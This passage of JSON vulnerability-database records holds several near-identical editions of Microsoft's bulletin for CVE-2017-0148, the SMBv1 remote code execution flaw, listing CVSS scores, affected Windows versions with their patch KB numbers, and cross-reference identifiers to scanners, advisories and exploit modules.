"metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-30T06:48:04", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB3213986", "KB4012606", "KB4013429", "KB3177186", "KB4012598", "KBMS16-110, 3187754", 
"KB4012212", "KB4013198", "KB3205409", "KB4012216", "KB3212646", "KB4012215", "KB4012217", "KB3205401", "KB4012214", "KB3210721", "KB3210720"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-30T06:48:04", "differentElements": ["msAffectedSoftware"], "edition": 82}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-30T20:47:04", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-30T06:48:04", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB3210721", "KB4012606", "KB4012216", "KB3210720", "KB3177186", "KB3212646", "KB4012217", "KB4012598", "KB3205401", "KB4012212", "KB3213986", "KB3205409", "KB4012215", "KB4012213", "KB4012214", "KBMS16-110, 3187754", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-30T20:47:04", "differentElements": ["msAffectedSoftware"], "edition": 83}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-01T06:44:56", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-30T06:48:04", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3212646", "KB3210721", "KB4013429", "KB4012214", "KB4012606", "KB4013198", "KB3205401", "KB4012215", 
"KB3177186", "KBMS16-110, 3187754", "KB3213986", "KB3210720", "KB4012598", "KB4012212", "KB4012216", "KB4012217", "KB4012213", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
